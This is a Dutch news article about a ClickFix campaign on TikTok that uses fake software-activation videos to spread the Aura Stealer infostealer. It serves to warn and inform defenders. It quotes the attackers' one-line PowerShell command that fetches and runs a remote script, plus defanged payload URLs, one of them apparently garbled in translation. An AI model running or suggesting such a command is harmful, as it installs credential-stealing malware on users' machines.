Cybercriminelen verspreiden informatiestelende malware op TikTok met behulp van video’s die zijn vermomd als gratis software-activeringsgidsen. Volgens BleepingComputerISC-handler Xavier Mertens identificeerde de lopende campagne, die gebruik maakt van een social engineering-methode die bekend staat als een ClickFix-aanval om computersystemen te infecteren. De video’s, waargenomen door BleepingComputerbeweren instructies te geven voor het activeren van legitieme software zoals Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro en Discord Nitro. De campagne promoot ook fictieve diensten, waaronder ‘Netflix Premium’ en ‘Spotify Premium’. Mertens merkte op dat deze activiteit grotendeels dezelfde is als een campagne die eerder in mei door beveiligingsbedrijf Trend Micro werd waargenomen. De video’s maken gebruik van een social engineering-techniek die een ogenschijnlijk geldige oplossing of reeks instructies presenteert om gebruikers te misleiden om hun eigen machines in gevaar te brengen. Deze ClickFix-aanval verleidt gebruikers ertoe kwaadaardige PowerShell-opdrachten uit te voeren. Elke video toont een opdracht van één regel, zoals `iex (irm slmgr[.]win/photoshop)`, en instrueert kijkers om het uit te voeren met beheerdersrechten. De programmanaam in de URL wordt aangepast zodat deze overeenkomt met de software die wordt nagebootst; een valse Windows-gids zou een URL gebruiken die ‘windows’ bevat in plaats van ‘photoshop’. Wanneer de opdracht wordt uitgevoerd, maakt PowerShell verbinding met de externe site `slmgr[.]win` om een ander PowerShell-script op te halen en uit te voeren. Dit script downloadt twee uitvoerbare bestanden van Cloudflare-pagina’s. De eerste, van `https://file-epq[.]pagina’s[.]dev/updater.exe`, is een variant van de Aura Stealer-malware. Deze infostealer is ontworpen om opgeslagen browsergegevens, authenticatiecookies, cryptocurrency-portemonneegegevens en andere applicatiegegevens te verzamelen. De gestolen gegevens worden vervolgens geüpload naar de aanvallers, waardoor ze toegang krijgen tot de accounts van het slachtoffer. Een tweede payload, `source.exe`, wordt ook gedownload als onderdeel van de aanval. Volgens Mertens compileert dit uitvoerbare bestand zelf code met behulp van de ingebouwde Visual C# Compiler van .NET (`csc.exe`). De resulterende code wordt vervolgens rechtstreeks in het geheugen geïnjecteerd en gelanceerd. Het specifieke doel van deze extra lading blijft onduidelijk. Gebruikers die deze stappen hebben uitgevoerd, moeten er rekening mee houden dat al hun inloggegevens zijn aangetast. De aanbevolen handelwijze is om de wachtwoorden op alle sites en services die ze gebruiken onmiddellijk opnieuw in te stellen om ongeoorloofde accounttoegang en verdere gegevensdiefstal te voorkomen. ClickFix-aanvallen zijn het afgelopen jaar populair geworden en worden gebruikt om verschillende soorten malware te verspreiden in ransomware- en cryptocurrency-diefstalcampagnes. Als algemene regel geldt dat gebruikers nooit tekst van een website mogen kopiëren en deze in een dialoogvenster van een besturingssysteem moeten uitvoeren. Dit advies omvat de adresbalk van File Explorer, de opdrachtprompt, PowerShell-prompts, de macOS-terminal en Linux-shells.
